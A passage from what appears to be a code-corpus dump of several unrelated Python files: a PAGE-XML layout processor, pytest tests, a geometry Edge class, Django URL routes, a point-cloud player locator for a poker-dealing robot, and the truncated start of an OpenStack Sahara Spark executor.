self.bBaseLine = False
self.bSeparator = False
self.bRegularTextLine = False
self.sTemplateFile = None
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
def setParams(self, dParams):
"""
Always call first the Component setParams
Here, we set our internal attribute according to a possibly specified value (otherwise it stays at its default value)
"""
Component.Component.setParams(self, dParams)
if "coldir" in dParams.keys():
self.coldir = dParams["coldir"].strip()
if "docid" in dParams.keys():
self.docid = dParams["docid"].strip()
# if dParams.has_key("bRegion"):
# self.bKeepRegion = dParams["bRegion"]
if "bTL" in dParams.keys():
self.bKeepTL = dParams["bTL"]
if "bBaseline" in dParams.keys():
self.bBaseLine = dParams["bBaseline"]
if "bSeparator" in dParams.keys():
self.bSeparator = dParams["bSeparator"]
if "template" in dParams.keys():
self.bTemplate = dParams["template"]
if "regTL" in dParams.keys():
self.bRegularTextLine = dParams["regTL"]
if "templatefile" in dParams.keys():
self.sTemplateFile = dParams["templatefile"]
self.bTemplate=True
def reintegrateTextIntoCells(self,doc,lLTextLines=[]):
"""
from XMLDSTABLE
"""
def overlapX(zone1,zone2):
[a1,a2] = zone1 #self.getX(),self.getX()+ self.getWidth()
[b1,b2] = zone2 #zone.getX(),zone.getX()+ zone.getWidth()
return min(a2, b2) >= max(a1, b1)
def overlapY(zone1,zone2):
[a1,a2] = zone1 #self.getY(),self.getY() + self.getHeight()
[b1,b2] = zone2 #zone.getY(),zone.getY() + zone.getHeight()
return min(a2, b2) >= max(a1, b1)
def signedRatioOverlap(zone1,zone2):
"""
overlap self and zone
return surface of self in zone
"""
[x1,y1,x12,y12] = zone1 #self.getX(),self.getY(),self.getHeight(),self.getWidth()
[x2,y2,x22,y22] = zone2 #zone.getX(),zone.getY(),zone.getHeight(),zone.getWidth()
w1,h1 = x12-x1,y12-y1
w2,h2 = x22-x2,y22-y2
fOverlap = 0.0
# print (x1,x12),(x2,x22)
# print overlapX((x1,x12),(x2,x22))
# print (y1,y12),(y2,y22)
# print overlapY((y1,y12),(y2,y22))
# if overlapX((x1,w1),(x2,w2)) and overlapY((y1,h1),(y2,h2)):
if overlapX((x1,x12),(x2,x22)) and overlapY((y1,y12),(y2,y22)):
[x11,y11,x12,y12] = [x1,y1,x1+w1,y1+h1]
[x21,y21,x22,y22] = [x2,y2,x2+w2,y2+h2]
s1 = w1 * h1
# possible ?
if s1 == 0: s1 = 1.0
#intersection
nx1 = max(x11,x21)
nx2 = min(x12,x22)
ny1 = max(y11,y21)
ny2 = min(y12,y22)
h = abs(nx2 - nx1)
w = abs(ny2 - ny1)
inter = h * w
if inter > 0 :
fOverlap = inter/s1
else:
# if overX and Y this is not possible !
fOverlap = 0.0
return fOverlap
def bestRegionsAssignment(plgtl,lRegions):
"""
find the best (max overlap for self) region for self
"""
lOverlap=[]
for _,plg in lRegions:
lOverlap.append(signedRatioOverlap(plgtl.getBoundingBox(),plg.getBoundingBox()))
# print plgtl.getBoundingBox(), lOverlap
if max(lOverlap) == 0: return None
return lRegions[lOverlap.index(max(lOverlap))]
lPages = PageXml.getChildByName(doc.getroot(),'Page')
lRegionsToBeDeleted = []
for i, page in enumerate(lPages):
if lLTextLines == []:
lTextLines = PageXml.getChildByName(page,'TextLine')
else: lTextLines =lLTextLines[i]
lCells = PageXml.getChildByName(page,'TableCell')
# print len(lCells),len(lTextLines)
lOCells=[]
for cell in lCells:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = cell.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
sPoints=coord.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
plg = Polygon(lXY)
lOCells.append((cell,plg))
# find the best assignment of each text
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
sPoints=coord.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
plg = Polygon(lXY)
cell = bestRegionsAssignment(plg,lOCells)
if cell:
c,_=cell
lRegionsToBeDeleted.append(c.parent)
## what about parent TextRegion delete at least TextRegion/TextEquiv
# tl.unlinkNode()
tlcp = tl.docCopyNode(c.doc,True)
# tlcp.unlinkNode()
c.append(tlcp)
# print c
for region in lRegionsToBeDeleted:
region.getParent().remove(region)
# region.unlinkNode()
# region.freeNode()
def reinitPage(self,doc):
"""
empty page
"""
lNodes = PageXml.getChildByName(doc.getroot(),'Page')
for node in lNodes:
node.unlinkNode()
def findTemplate(self,doc):
"""
find the page where the first TableRegion occurs and extract it
"""
from copy import deepcopy
lT = PageXml.getChildByName(doc.getroot(),'TableRegion')
if lT == []:
return None
firstTable=lT[0]
# lazy guy!
newDoc,fakepage = PageXml.createPageXmlDocument('NLE', '', 0,0)
page=firstTable.getparent()
fakepage.set("imageFilename",page.get('imageFilename'))
fakepage.set("imageWidth",page.get('imageWidth'))
fakepage.set("imageHeight",page.get('imageHeight'))
page.getparent().remove(page)
# add table
xx =deepcopy(firstTable)
fakepage.append(xx)
return newDoc
def createRegistrationProfile(self,sTemplatefile):
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
txt= LAProcessor.cCVLProfileTabReg % (listfile,localpath.replace(os.sep,"/"),os.path.abspath("%s"%(sTemplatefile)).replace(os.sep,"/"))
# wb mandatory for crlf in windows
prnfilename = "%s%s%s_reg.prn"%(self.coldir,os.sep,self.docid)
f=open(prnfilename,'w', encoding="utf-8")
f.write(txt)
return prnfilename
def createLinesProfile(self):
"""
OutputDirPath mandatory
"""
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
localpath = localpath.replace(os.sep,'/')
txt = LAProcessor.cCVLLASeparatorProfile % (listfile,localpath)
# wb mandatory for crlf in windows
prnfilename = "%s%s%s_gl.prn"%(self.coldir,os.sep,self.docid)
f=open(prnfilename,'wb')
f.write(txt)
return prnfilename
def createLAProfile(self):
"""
OutputDirPath mandatory
"""
# get all images files
localpath = os.path.abspath("./%s/col/%s"%(self.coldir,self.docid))
l = glob.glob(os.path.join(localpath, "*.jpg"))
l.sort()
listfile = ";".join(l)
listfile = listfile.replace(os.sep,"/")
localpath = localpath.replace(os.sep,'/')
txt = LAProcessor.cCVLLAProfile % (listfile,localpath,self.bKeepRegion)
# print txt
# wb mandatory for crlf in windows
prnfilename = "%s%s%s_la.prn"%(self.coldir,os.sep,self.docid)
f=open(prnfilename,'wb')
f.write(txt)
return prnfilename
def storeMPXML(self,lFiles):
"""
store files in lFiles as mpxml
"""
docDir = os.path.join(self.coldir+os.sep+'col',self.docid)
doc = MultiPageXml.makeMultiPageXml(lFiles)
sMPXML = docDir+".mpxml"
# print sMPXML
doc.write(sMPXML,encoding="UTF-8",pretty_print=True,xml_declaration=True)
# trace("\t\t- validating the MultiPageXml ...")
# if not MultiPageXml.validate(doc):
# traceln(" *** WARNING: XML file is invalid against the schema: '%s'"%self.outputFileName)
# traceln(" Ok!")
return doc, sMPXML
def extractFileNamesFromMPXML(self,doc):
"""
to insure correct file order !
"""
xmlpath=os.path.abspath("%s%s%s%s%s" % (self.coldir,os.sep,'col',os.sep,self.docid))
lNd = PageXml.getChildByName(doc.getroot(), 'Page')
# for i in lNd:print i
return list(map(lambda x:"%s%s%s.xml"%(xmlpath,os.sep,x.get('imageFilename')[:-4]), lNd))
def performLA(self,doc):
"""
# for document doc
## find the page where the template is
## store it as template (check borders))
## generate profile for table registration
## (execution)
## create profile for lA
## (execution)
"""
# lNumPages = []
if self.bTemplate or self.bBaseLine or self.bSeparator:
# extract list of files sorted as in MPXML
lFullPathXMLNames = self.extractFileNamesFromMPXML(doc)
nbPages = len(lFullPathXMLNames)
## 1 generate xml files if only pxml are there
xmlpath=os.path.abspath(os.path.join (self.coldir,'col',self.docid))
lXMLNames = [ "%s%s%s"%(xmlpath,os.sep,name) for name in os.listdir(xmlpath) if os.path.basename(name)[-4:] =='.xml']
isXml = [] != lXMLNames
if isXml:
[ os.remove("%s%s%s"%(xmlpath,os.sep,name)) for name in os.listdir(xmlpath) if os.path.basename(name)[-4:] =='.xml']
isXml = False
isPXml = [] != [ name for name in os.listdir(xmlpath) if os.path.basename(name)[-5:] =='.pxml']
assert not isXml and isPXml
# recreate doc? (mpxml)
lPXMLNames = [ name for name in os.listdir(xmlpath) if os.path.basename(name)[-5:] =='.pxml']
if not isXml:
# copy pxml in xml
for name in lPXMLNames:
oldname = "%s%s%s" %(xmlpath,os.sep,name)
newname = "%s%s%s" % (xmlpath,os.sep,name)
newname = newname[:-5]+'.xml'
tmpdoc = etree.parse(oldname)
tmpdoc.write(newname,encoding="UTF-8", pretty_print=True,xml_declaration=True)
if self.bKeepTL:
# keep ltextLione
lTextLines=[]
lPages = PageXml.getChildByName(doc.getroot(),'Page')
for page in lPages:
lTextLines.append(PageXml.getChildByName(page,'TextLine'))
## Table registration
if self.bTemplate:
if self.sTemplateFile is None:
templatePage = self.findTemplate(doc)
if templatePage is None:
traceln("No table found in this document: %s" % self.docid)
else:
oldOut= self.outputFileName
self.outputFileName = "%s%s%s.templ.xml" % (self.coldir,os.sep,self.docid)
stemplatefile = "%s%s%s.templ.xml" % (self.coldir,os.sep,self.docid)
print (stemplatefile)
self.writeDom(templatePage, True)
self.outputFileName = oldOut
prnregfilename= self.createRegistrationProfile(stemplatefile)
else:
# raise Exception, 'file template stuff: to be done'
prnregfilename= self.createRegistrationProfile(self.sTemplateFile)
job = LAProcessor.cNomacs+ " --batch %s"%(prnregfilename)
os.system(job)
traceln('table registration done: %s'% prnregfilename)
## separator detection
if self.bSeparator:
prnglfilename = self.createLinesProfile()
job = LAProcessor.cNomacs+ " --batch %s"%(prnglfilename)
os.system(job)
traceln( 'GL done: %s' % prnglfilename)
## baseline detection
if self.bBaseLine:
prnlafilename = self.createLAProfile()
# job = LAProcessor.cNomacs+ " --batch %s"%(prnlafilename)
job = LAProcessor.cNomacsold+ " --batch %s"%(prnlafilename)
os.system(job)
traceln('LA done: %s' % prnlafilename)
if self.bTemplate or self.bBaseLine or self.bSeparator:
doc, sMPXML= self.storeMPXML(lFullPathXMLNames)
# Does not work with URO LA!
if self.bKeepTL:
self.reintegrateTextIntoCells(doc,lTextLines)
## text rectangles as textline region
if self.bRegularTextLine:
self.regularTextLines(doc)
doc.write(sMPXML,encoding="UTF-8",pretty_print=True,xml_declaration=True)
return doc, nbPages
def regularTextLinesold(self,doc):
"""
from a baseline: create a regular TextLine:
also: for slanted baseline:
"""
from shapely.geometry import LineString
from shapely.affinity import translate
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
lTextLines = PageXml.getChildByName(doc.getroot(),'TextLine')
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
xpath = "./a:%s" % ("Baseline")
lBL = tl.xpath(xpath,namespaces={"a": self.xmlns})
baseline = lBL[0]
sPoints=baseline.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
try:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
except ValueError:print (tl)
plg = Polygon(lXY)
line=LineString(lXY)
# 50 seems to large: the manual GT is 30 ? not always!
iHeight = 30 # in pixel
x1,y1, x2,y2 = plg.getBoundingBox()
if coord is not None:
coord.set('points',"%d,%d %d,%d %d,%d %d,%d" % (x1,y1-iHeight,x2,y1-iHeight,x2,y2,x1,y2))
else:
print (tl)
def regularTextLines(self,doc):
"""
from a baseline: create a regular TextLine:
"""
from shapely.geometry import LineString
from shapely.affinity import translate
self.xmlns='http://schema.primaresearch.org/PAGE/gts/pagecontent/2013-07-15'
lTextLines = PageXml.getChildByName(doc.getroot(),'TextLine')
for tl in lTextLines:
#get Coords
xpath = "./a:%s" % ("Coords")
lCoords = tl.xpath(xpath,namespaces={"a": self.xmlns})
coord= lCoords[0]
xpath = "./a:%s" % ("Baseline")
lBL = tl.xpath(xpath,namespaces={"a": self.xmlns})
try:baseline = lBL[0]
except IndexError:continue
sPoints=baseline.get('points')
lsPair = sPoints.split(' ')
lXY = list()
for sPair in lsPair:
try:
(sx,sy) = sPair.split(',')
lXY.append( (int(sx), int(sy)) )
except ValueError:print (tl)
#plg = Polygon(lXY)
try: line=LineString(lXY)
except ValueError: continue # LineStrings must have at least 2 coordinate tuples
topline=translate(line,yoff=-20)
#iHeight = 20 # in pixel
#x1,y1, x2,y2 = topline.getBoundingBox()
if coord is not None:
spoints = ' '.join("%s,%s"%(int(x[0]),int(x[1])) for x in line.coords)
lp=list(topline.coords)
lp.reverse()
spoints =spoints+ ' ' +' '.join("%s,%s"%(int(x[0]),int(x[1])) for x in lp)
#spoints = ' '.join("%s,%s"%(x[0],x[1]) for x in pp.coords)
#coord.set('points',"%d,%d %d,%d %d,%d %d,%d" % (x1,y1-iHeight,x2,y1-iHeight,x2,y2,x1,y2))
coord.set('points',spoints)
else:
print (tl)
# print tl
def run(self,doc):
"""
GT from TextRegion
or GT from Table
input mpxml (GT)
delete TextLine
"""
if not (self.bTemplate or self.bBaseLine or self.bSeparator) and self.bRegularTextLine:
self.regularTextLines(doc)
self.writeDom(doc, True)
else:
doc,nbpages = self.performLA(doc)
return doc
if __name__ == "__main__":
# for each document
## find the page where the template is
## store it as template (check borders))
## generate profile for table registration
## (execution)
## create profile for lA
## (execution)
tp = LAProcessor()
#prepare for the parsing of the command line
tp.createCommandLineParser()
tp.add_option("--coldir", dest="coldir", action="store", type="string", help="collection folder")
tp.add_option("--docid", dest="docid", action="store", type="string", help="document id")
tp.add_option("--bl", dest="bBaseline", action="store_true", default=False, help="detect baselines")
# tp.add_option("--region", dest="bRegion", action="store_true", default=False, help="keep Region")
tp.add_option("--tl", dest="bTL", action="store_true", default=False, help="keep textlines")
tp.add_option("--sep", dest="bSeparator", action="store_true", default=False, help="detect separator (graphical lines)")
tp.add_option("--regTL", dest="regTL", action="store_true", default=False, help="generate regular TextLines")
tp.add_option("--form", dest="template", action="store_true", default=False, help="perform template registration")
tp.add_option("--formfile", dest="templatefile", action="store", type='string', default=None,help="use this template file (pagexml) for registration")
#tp.add_option("--form", dest="template", action="store", type="string", help="perform template registration")
#parse the command line
dParams, args = tp.parseCommandLine()
#Now we are back to the normal programmatic mode, we set the componenet parameters
tp.setParams(dParams)
doc = tp.loadDom()
tp.run(doc)
| 1.625 | 2 |
tests/pert_test.py | EnricaBelfiore/sandy | 30 | 12786779 | import pytest
from io import StringIO
import numpy as np
import pandas as pd
import sandy
__author__ = "<NAME>"
#####################
# Test initialization
#####################
def test_from_file_1_column():
vals = '1\n5\n9'
file = StringIO(vals)
with pytest.raises(Exception):
sandy.Pert.from_file(file)
def test_from_file_non_monotonic():
vals = '1 1\n6 5\n5 2\n9 3'
file = StringIO(vals)
with pytest.raises(Exception):
sandy.Pert.from_file(file)
@pytest.fixture(scope="module")
def pert3():
vals = '1 1 5\n5 2 1\n9 3 1'
file = StringIO(vals)
return sandy.Pert.from_file(file)
def test_from_file_3_columns(pert3):
# should try and catch the warning
pass
def test_init_with_series(pert3):
pert = sandy.Pert(pert3.right)
assert pert.data.equals(pert3.data)
def test_init_with_dataframe(pert3):
with pytest.raises(Exception):
sandy.Pert(pert3.right.to_frame())
def test_init_with_intervalindex(pert3):
pert = sandy.Pert(pert3.data)
assert pert.data.equals(pert3.data)
################################
# Test initialization attributes
################################
def test_Pert_type(pert3):
assert isinstance(pert3, sandy.Pert)
def test_Pert_data_index_type(pert3):
assert isinstance(pert3.data.index, pd.IntervalIndex)
def test_Pert_data_index_right_values(pert3):
assert pert3.data.index.right.tolist() == [1, 5, 9]
def test_Pert_data_index_left_values(pert3):
assert pert3.data.index.left.tolist() == [0, 1, 5]
def test_Pert_data_index_float(pert3):
assert pert3.data.index.right.values.dtype == float
def test_Pert_data_values(pert3):
np.testing.assert_array_equal(pert3.data.values, [1,2,3])
def test_Pert_data_values_float(pert3):
assert pert3.data.values.dtype == float
########################
# Test attributes
########################
########################
# Test methods
########################
# def test_Spectrum_selfreshape(spec_const):
# S = spec_const.reshape(spec_const.right.index)
# assert np.allclose(S.data.values,spec_const.data.values)
# @pytest.mark.parametrize("eg, flux",
# [
# ([30], 500),
# ([6e-12], 0.6),
# ([5e-12], 0.5),
# ([4e-12], 0.4),
# ([1e-11], 1),
# ([18.896380829766173], 499),
# ([1e-10, 1e-9, 1e-8, 1e-7, 1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1e0, 1e1, 20], 500),
# ]
# )
# def test_Spectrum_reshape(spec_const, eg, flux):
# S = spec_const.reshape(eg)
# assert S.right.index.tolist() == eg
# assert S.flux == pytest.approx(flux)
# @pytest.mark.parametrize("eg, err, errtype",
# [
# ([2, 1], True, ValueError),
# ([2, 2], False, None),
# ([-1, 2], True, ValueError),
# ]
# )
# def test_Spectrum_reshape_error(spec_const, eg, err, errtype):
# if err:
# with pytest.raises(errtype):
# spec_const.reshape(eg)
# else:
# spec_const.reshape(eg) | 2.140625 | 2 |
sect/core/trapezoidal/edge.py | lycantropos/sect | 17 | 12786780 | from ground.base import (Context,
Orientation)
from ground.hints import Point
from reprit.base import generate_repr
class Edge:
@classmethod
def from_endpoints(cls,
left: Point,
right: Point,
interior_to_left: bool,
context: Context) -> 'Edge':
"""Constructs edge given its endpoints."""
return cls(left, right, interior_to_left, context)
__slots__ = 'context', 'interior_to_left', 'left', 'right'
def __init__(self,
left: Point,
right: Point,
interior_to_left: bool,
context: Context) -> None:
assert left < right, 'Incorrect endpoints order'
self.context, self.interior_to_left, self.left, self.right = (
context, interior_to_left, left, right)
def __lt__(self, other: 'Edge') -> bool:
"""Checks if the edge is lower than the other."""
other_left_orientation = self.orientation_of(other.left)
other_right_orientation = self.orientation_of(other.right)
if other_left_orientation is other_right_orientation:
return other_left_orientation is Orientation.COUNTERCLOCKWISE
elif other_left_orientation is Orientation.COLLINEAR:
return other_right_orientation is Orientation.COUNTERCLOCKWISE
left_orientation = other.orientation_of(self.left)
right_orientation = other.orientation_of(self.right)
if left_orientation is right_orientation:
return left_orientation is Orientation.CLOCKWISE
elif left_orientation is Orientation.COLLINEAR:
return right_orientation is Orientation.CLOCKWISE
elif other_right_orientation is Orientation.COLLINEAR:
return other_left_orientation is Orientation.COUNTERCLOCKWISE
else:
return (left_orientation is Orientation.CLOCKWISE
if right_orientation is Orientation.COLLINEAR
# crossing edges are incomparable
else NotImplemented)
__repr__ = generate_repr(__init__)
def orientation_of(self, point: Point) -> Orientation:
"""Returns orientation of the point relative to the edge."""
return self.context.angle_orientation(self.left, self.right, point)
| 3.234375 | 3 |
asset_app/urls.py | jameskomo/asset-management-system | 3 | 12786781 | <gh_stars>1-10
from django.urls import path
from django.conf.urls import url
from .views import (
AssetsListView,
AssetsDetailView,
AssetsCreateView,
AssetsUpdateView,
AssetsDeleteView,
)
from . import views
urlpatterns = [
path('', AssetsListView.as_view(), name='assets_app_home'),
path('assets/<int:pk>/', AssetsDetailView.as_view(), name='assets-detail'),
path('assets/new/', AssetsCreateView.as_view(), name='assets-create'),
path('assets/<int:pk>/update/', AssetsUpdateView.as_view(), name='assets-update'),
path('assets/<int:pk>/delete/', AssetsDeleteView.as_view(), name='assets-delete'),
path('about/', views.about, name='asset_app-about'),
url(r'^searchassets/$', views.assetssearch, name='assetssearch'),
]
| 1.851563 | 2 |
src/areas_determination.py | joeyzhong90595/Robotic_Poker_Dealer | 2 | 12786782 | <filename>src/areas_determination.py<gh_stars>1-10
#!/usr/bin/env python
import numpy as np
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import pcl
from sensor_msgs.msg import PointCloud
# Extra points from point cloud according to indices
def extra_pc(pc, indices):
coord = []
for index in indices:
coord.append(list(pc[index]))
array = np.array(coord, dtype='float32')
pc = pcl.PointCloud(array)
return pc
# Pass through pc filter
def pass_through(pc, field="z", range=[0,3]):
pass_fil = pc.make_passthrough_filter()
pass_fil.set_filter_field_name(field)
pass_fil.set_filter_limits(range[0], range[1])
return pass_fil.filter()
# Down sampling point clouds
def down_sampling(pc, leaf_size=[0.03, 0.03, 0.03]):
sor = pc.make_voxel_grid_filter()
sor.set_leaf_size(leaf_size[0], leaf_size[1], leaf_size[2])
return sor.filter()
# Point cloud plane detection
def plane_detection(pc, k=50, optimize=True, model=pcl.SACMODEL_NORMAL_PLANE,
method=pcl.SAC_RANSAC, dis_threshold=0.01, normal_weight=0.01, iteration=100):
seg = pc.make_segmenter_normals(ksearch=k)
seg.set_optimize_coefficients(optimize)
seg.set_model_type(model)
seg.set_method_type(method)
seg.set_distance_threshold(dis_threshold)
seg.set_normal_distance_weight(normal_weight)
seg.set_max_iterations(iteration)
indices, coefficients = seg.segment()
if len(indices) == 0:
print('Could not estimate a planar model for the given dataset.')
exit(0)
return indices, coefficients
# Outlier filter
def outlier_fil(pc, mean=50, sdv=1):
outlier_fil = pc.make_statistical_outlier_filter()
outlier_fil.set_mean_k(mean)
outlier_fil.set_std_dev_mul_thresh(sdv)
return outlier_fil.filter()
# Get homogeneous matrix from point o, x, y
def get_homogeneous(o, x, y):
# Origin coordinate
x0 = np.array([1, 0, 0])
y0 = np.array([0, 1, 0])
z0 = np.array([0, 0, 1])
# New coordinate
x1 = (x-o) / np.linalg.norm(x-o)
y1 = (y-o) / np.linalg.norm(y-o)
z1 = np.cross(x1,y1)
# Transform homogeneous matrix
homo = np.array([[np.dot(x1,x0), np.dot(y1,x0), np.dot(z1,x0), o[0]],
[np.dot(x1,y0), np.dot(y1,y0), np.dot(z1,y0), o[1]],
[np.dot(x1,z0), np.dot(y1,z0), np.dot(z1,z0), o[2]],
[0, 0, 0, 1]])
return homo
# Main
def det_areas(rgb_image, pc2, loc):
'''
Return player side information and displacement in table coordinate
:param rbg_image: rbg kinect image
:param pc2: point cloud
:param loc: players' location in image
:return: A list consisting of player's side and player's displacement
in table coordinate of each player
'''
# Find The Table
# Pass through the far away points
passed_pc = pass_through(pc2)
# Down sampling to simplify calculation
sored_pc = down_sampling(passed_pc)
# Find plane
indices, coefficients = plane_detection(sored_pc)
# Extra plane
plane_pc = extra_pc(sored_pc, indices)
# Filte outlier
table_pc = outlier_fil(plane_pc)
# Determine Table Coordinate
# Sort the points
array_table = table_pc.to_array()
z_array = array_table[array_table[:,2].argsort()] # sort according to z
x_array = array_table[array_table[:,0].argsort()] # sort according to x
# Use some samples to determine corners
num_sample = 3
top_corner = np.zeros(3)
left_corner = np.zeros(3)
right_corner = np.zeros(3)
for i in range(num_sample):
top_corner += z_array[-(i+1)]
left_corner += x_array[i]
right_corner += x_array[-(i+1)]
top_corner /= num_sample
left_corner /= num_sample
right_corner /= num_sample
# Calculate homogeneous matrix
homo_matrix = get_homogeneous(top_corner, left_corner, right_corner)
'''
# For debugging
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(array_table[:,0], array_table[:,1], array_table[:,2], zdir='z', c='black')
ax.scatter(top_corner[0], top_corner[1], top_corner[2], zdir='z', c='red')
ax.scatter(left_corner[0], left_corner[1], left_corner[2], zdir='z', c='red')
ax.scatter(right_corner[0], right_corner[1], right_corner[2], zdir='z', c='red')
'''
# Determine Player Location in Table Coordinate
players_info = []
# load each player
for player_loc in loc:
# Player Info Container
# First element decides where the player is
# Second element decides the displacement between the player and the origin
info = []
# See whether the player is sitting on the left or right
if player_loc[3] < 470:
info.append(2) # 2 represents left
else:
info.append(1) # 1 represents right
# Get Facial Points in world coordinates
face_index = []
# Calculate face coordinate
for y in range(player_loc[0], player_loc[2]+1):
for x in range(player_loc[3], player_loc[1]+1):
face_index.append(y*len(rgb_image[0]) + x)
# Extra face points
pc_face = extra_pc(pc2, face_index)
# Pass through the far away points
passed_face = pass_through(pc_face)
# Down sampling to simplify calculation
sored_face = down_sampling(passed_face)
# Perform a outlier filter
filtered_face = outlier_fil(sored_face)
# Calculate player location
face_loc = filtered_face
# Calculate Displacement in New Coordinate
# Take the average coord as player location
array_face = face_loc.to_array()
face_camera_coord = np.average(array_face, axis=0)
# Transform from camera coordinate to table coordinate
face_table_coord = np.dot(np.linalg.inv(homo_matrix), np.append(face_camera_coord, 1))
# The displacement information
if info[0] == 1:
displacement = face_table_coord[1]
else:
displacement = face_table_coord[0]
info.append(int(displacement*1000))
# Save result
players_info.append(info)
'''
# For debugging
ax.scatter(face_camera_coord[0], face_camera_coord[1], face_camera_coord[2], zdir='z', c= 'yellow')
ax.scatter(array_face[:,0], array_face[:,1], array_face[:,2], zdir='z', c= 'orange')
plt.show() # For debugging '''
players_arr = np.array(players_info)
index = np.lexsort((players_arr[:,1], players_arr[:,0]))
players_info = players_arr[index].tolist()
return players_info
if __name__ == "__main__":
from player_recognition import face_rec
import os
# load image
rbg_image_path = os.path.join(os.path.dirname(__file__),"../data/test_rgb.jpg")
rbg_image = mpimg.imread(rbg_image_path)
pcl_path = os.path.join(os.path.dirname(__file__),"../data/test.pcd")
pc2 = pcl.load(pcl_path)
# detect areas
loc = face_rec(rbg_image)
infos = det_areas(rbg_image, pc2, loc)
# show result
for info in infos:
print ["Player side:", info[0], "Player displacement:", info[1]]
| 2.328125 | 2 |
18f/prac2/aah.py | willzhang05/icpc-practice | 0 | 12786783 | <filename>18f/prac2/aah.py
a = input()
b = input()
print("go" if len(b) <= len(a) else "no")
| 3.21875 | 3 |
nodenet/python/nodenet/trainingsessions/__init__.py | NOOXY-research/NodeNet | 2 | 12786784 | <gh_stars>1-10
# Create alias
from nodenet.trainingsessions.batch import *
from nodenet.trainingsessions.online import *
| 0.957031 | 1 |
broker/plugins/spark_sahara/plugin.py | alessandroliafook/bigsea-manager | 3 | 12786785 | <reponame>alessandroliafook/bigsea-manager<filename>broker/plugins/spark_sahara/plugin.py
# Copyright (c) 2017 UFCG-LSD.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import os
import subprocess
import time
import threading
import uuid
import math
from broker import exceptions as ex
from broker.utils.openstack import connector as os_connector
from broker.plugins import base
from broker.service import api
from broker.utils import hdfs
from broker.utils.framework import monitor
from broker.utils.framework import optimizer
from broker.utils import remote
from broker.utils.framework import controller
from broker.utils import spark
from broker.utils.logger import Log, configure_logging
from saharaclient.api.base import APIException as SaharaAPIException
from broker.utils.ids import ID_Generator
from broker.plugins.base import GenericApplicationExecutor
plugin_log = Log("Sahara_Plugin", "logs/sahara_plugin.log")
application_time_log = Log("Application_Time", "logs/application_time.log")
instances_log = Log("Instances", "logs/instances.log")
configure_logging()
class OpenStackSparkApplicationExecutor(GenericApplicationExecutor):
def __init__(self, app_id):
self.application_state = "None"
self.state_lock = threading.RLock()
self.application_time = -1
self.start_time = -1
self.app_id = app_id
self._verify_existing_log_paths(app_id)
self._clean_log_files(app_id)
self.running_log = Log("Running_Application_%s" % app_id,
"logs/apps/%s/execution" % app_id)
self.stdout = Log("stdout_%s" % app_id, "logs/apps/%s/stdout" % app_id)
self.stderr = Log("stderr_%s" % app_id, "logs/apps/%s/stderr" % app_id)
def get_application_state(self):
with self.state_lock:
state = self.application_state
return state
def update_application_state(self, state):
with self.state_lock:
self.application_state = state
def get_application_execution_time(self):
return self.application_time
def get_application_start_time(self):
return self.start_time
def start_application(self, data, spark_applications_ids, app_id):
try:
self.update_application_state("Running")
# Broker Parameters
cluster_id = None
user = api.user
password = <PASSWORD>
project_id = api.project_id
auth_ip = api.auth_ip
domain = api.domain
public_key = api.public_key
key_path = api.key_path
log_path = api.log_path
container = api.container
hosts = api.hosts
remote_hdfs = api.remote_hdfs
swift_logdir = api.swift_logdir
number_of_attempts = api.number_of_attempts
dummy_opportunistic = api.dummy_opportunistic
# User Request Parameters
net_id = data['net_id']
master_ng = data['master_ng']
slave_ng = data['slave_ng']
op_slave_ng = data['opportunistic_slave_ng']
opportunism = str(data['opportunistic'])
plugin = data['openstack_plugin']
percentage = int(data['percentage'])
job_type = data['job_type']
version = data['version']
args = data['args']
main_class = data['main_class']
dependencies = data['dependencies']
job_template_name = data['job_template_name']
job_binary_name = data['job_binary_name']
job_binary_url = data['job_binary_url']
image_id = data['image_id']
monitor_plugin = data['monitor_plugin']
expected_time = data['expected_time']
collect_period = data['collect_period']
number_of_jobs = data['number_of_jobs']
image_id = data['image_id']
starting_cap = data['starting_cap']
# Optimizer Parameters
app_name = data['app_name']
days = 0
if app_name.lower() == 'bulma':
if 'days' in data.keys():
days = data['days']
else:
self._log("""%s | 'days' parameter missing"""
% (time.strftime("%H:%M:%S")))
raise ex.ConfigurationError()
# Openstack Components
connector = os_connector.OpenStackConnector(plugin_log)
sahara = connector.get_sahara_client(user, password, project_id,
auth_ip, domain)
swift = connector.get_swift_client(user, password, project_id,
auth_ip, domain)
nova = connector.get_nova_client(user, password, project_id,
auth_ip, domain)
# Optimizer gets the vcpu size of flavor
cores_per_slave = connector.get_vcpus_by_nodegroup(nova,
sahara,
slave_ng)
cores, vms = optimizer.get_info(api.optimizer_url,
expected_time,
app_name,
days)
